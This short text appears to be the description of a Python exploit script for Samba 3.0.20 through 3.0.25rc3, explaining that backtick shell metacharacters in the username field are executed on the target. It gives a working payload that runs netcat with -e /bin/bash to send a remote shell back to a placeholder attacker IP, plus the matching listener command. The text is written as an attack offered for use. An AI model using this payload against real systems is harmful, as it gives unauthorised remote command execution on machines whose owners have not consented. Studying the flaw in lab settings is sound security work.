Easy to read Python script for exploiting Samba versions 3.0.20 through 3.0.25rc3
The payload for this script lies in the user field. This particular version of samba accepts metacharacters used in shell scripting for command line execution: `command to run ` By inserting the ticks into the user field one can execute any command on the target computer.
user = "`" + "nc <YOUR IP ADDRESS> 9999 -e /bin/bash" + "`"
In my case I used netcat to gain a remote bash shell on the target computer. If you intend to do the same, make sure to set up a listening port to catch the bash shell. Example:
nc -lvp 9999